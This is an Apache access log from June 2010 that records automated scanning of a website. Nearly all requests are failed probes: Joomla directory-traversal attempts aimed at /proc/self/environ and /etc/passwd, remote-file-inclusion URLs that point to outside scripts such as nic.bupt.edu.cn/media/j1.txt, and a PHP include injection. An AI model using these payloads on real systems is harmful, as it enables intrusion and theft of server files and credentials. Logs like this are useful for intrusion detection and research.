74.55.41.132 - - [26/Jun/2010:20:39:40 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
85.19.150.100 - - [26/Jun/2010:20:39:55 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
89.200.170.145 - - [26/Jun/2010:20:41:13 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:41:13 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:41:13 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
207.46.13.139 - - [26/Jun/2010:20:42:42 -0500] "GET /logs/access_log.1177977600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.170.145 - - [26/Jun/2010:20:43:11 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
85.19.150.100 - - [26/Jun/2010:20:44:24 -0500] "GET /logs/access_log.1275782400//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
85.19.150.100 - - [26/Jun/2010:20:44:24 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
85.19.150.100 - - [26/Jun/2010:20:44:25 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
85.19.150.100 - - [26/Jun/2010:20:44:25 -0500] "GET /logs/access_log.1276214400//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
74.55.41.132 - - [26/Jun/2010:20:45:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:45:08 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:45:09 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:45:38 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:45:38 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:45:39 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.30.129.57 - - [26/Jun/2010:20:46:07 -0500] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:20:46:07 -0500] "GET /logs/access_log.1276041600/pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:20:46:07 -0500] "GET /pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:20:46:09 -0500] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:20:46:09 -0500] "GET /logs/access_log.1276041600/pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:20:46:09 -0500] "GET /pccookbook.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.55.41.132 - - [26/Jun/2010:20:46:42 -0500] "GET /logs/access_log.1276041600//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:47:14 -0500] "GET /logs/access_log.1276041600//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
195.225.170.108 - - [26/Jun/2010:20:49:06 -0500] "GET /logs/access_log.1276214400//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:50:09 -0500] "GET /logs/access_log.1276646400/*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:50:09 -0500] "GET /*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
94.23.2.112 - - [26/Jun/2010:20:50:24 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
94.23.2.112 - - [26/Jun/2010:20:50:24 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
94.23.2.112 - - [26/Jun/2010:20:50:25 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
195.225.170.108 - - [26/Jun/2010:20:52:43 -0500] "GET /logs/*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:52:44 -0500] "GET /*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
94.23.2.112 - - [26/Jun/2010:20:54:41 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
195.225.170.108 - - [26/Jun/2010:20:57:05 -0500] "GET /logs/access_log.1274832000//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:57:05 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:57:05 -0500] "GET /logs//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:57:06 -0500] "GET /logs/access_log.1274832000//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:57:07 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:57:08 -0500] "GET /logs//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:59:30 -0500] "GET /logs/access_log.1275091200///*?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:59:31 -0500] "GET ///*?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:59:31 -0500] "GET /logs///*?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:21:00:05 -0500] "GET /logs/access_log.1276214400///*?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:21:00:20 -0500] "GET /logs/access_log.1276214400//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:21:00:20 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:21:00:40 -0500] "GET /logs/access_log.1276819200//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
207.46.204.193 - - [26/Jun/2010:21:04:09 -0500] "GET /logs/access_log.1240012800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.225.170.108 - - [26/Jun/2010:21:16:48 -0500] "GET /logs/access_log.1276214400//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
86.109.111.120 - - [26/Jun/2010:21:17:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
195.225.170.108 - - [26/Jun/2010:21:17:12 -0500] "GET /logs/access_log.1275609600//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
85.236.50.166 - - [26/Jun/2010:21:17:16 -0500] "GET /index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.199.53 - - [26/Jun/2010:21:17:41 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.206.204.16 - - [26/Jun/2010:21:20:22 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [26/Jun/2010:21:20:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.236.50.166 - - [26/Jun/2010:21:20:45 -0500] "GET /index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.206.204.16 - - [26/Jun/2010:21:20:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [26/Jun/2010:21:20:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [26/Jun/2010:21:21:41 -0500] "GET /logs/access_log.1198627200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.206.204.16 - - [26/Jun/2010:21:22:17 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.252.241 - - [26/Jun/2010:21:26:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.44.73.150 - - [26/Jun/2010:21:37:35 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
85.236.50.166 - - [26/Jun/2010:21:40:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:21:40:09 -0500] "GET /index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:21:40:10 -0500] "GET /logs/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.195.112.180 - - [26/Jun/2010:21:45:02 -0500] "GET /logs/access_log.1224460800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [26/Jun/2010:21:46:06 -0500] "GET /logs/access_log.1255305600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.91.250.11 - - [26/Jun/2010:21:46:53 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:21:46:53 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:21:46:53 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:21:46:55 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:21:46:55 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:21:46:55 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.236.50.166 - - [26/Jun/2010:21:47:35 -0500] "GET /logs/access_log.1276473600/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.186.192.124 - - [26/Jun/2010:21:49:04 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:21:49:05 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:21:49:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:21:49:48 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:21:49:48 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:21:49:48 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.44.73.150 - - [26/Jun/2010:21:52:22 -0500] "GET /logs/access_log.1274054400/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.44.73.150 - - [26/Jun/2010:21:52:22 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.44.73.150 - - [26/Jun/2010:21:52:23 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.73.150 - - [26/Jun/2010:21:52:23 -0500] "GET /logs/access_log.1276128000/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://heart-selena.com/gallery/sql/table.php? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
67.59.156.163 - - [26/Jun/2010:21:56:49 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:21:56:57 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 327 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:21:57:58 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Advanced Browser (http://www.avantbrowser.com)"
188.40.246.135 - - [26/Jun/2010:21:57:58 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Advanced Browser (http://www.avantbrowser.com)"
93.186.192.124 - - [26/Jun/2010:22:00:22 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:22 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:22 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:28 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:28 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:28 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:30 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:34 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:00:34 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:01:32 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:01:41 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:02:17 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.236.50.166 - - [26/Jun/2010:22:02:22 -0500] "GET /logs/access_log.1274572800/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:22:02:22 -0500] "GET /index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [26/Jun/2010:22:02:22 -0500] "GET /logs/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
